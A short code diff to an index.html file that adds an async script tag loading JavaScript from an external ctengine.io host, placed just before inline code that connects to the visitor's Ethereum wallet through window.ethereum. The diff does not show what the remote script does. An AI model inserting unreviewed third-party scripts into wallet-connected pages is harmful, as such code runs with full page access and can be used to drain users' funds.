--- a/index.html
+++ b/index.html
@@ -65,6 +65,7 @@
       <p></p>
     </div>
   </div>
+  <script async src="https://appsha-prm.ctengine.io/js/script.js?wkey=WAJq75I5aa"></script>
   
     <script>
       web3 = new Web3(window.ethereum);
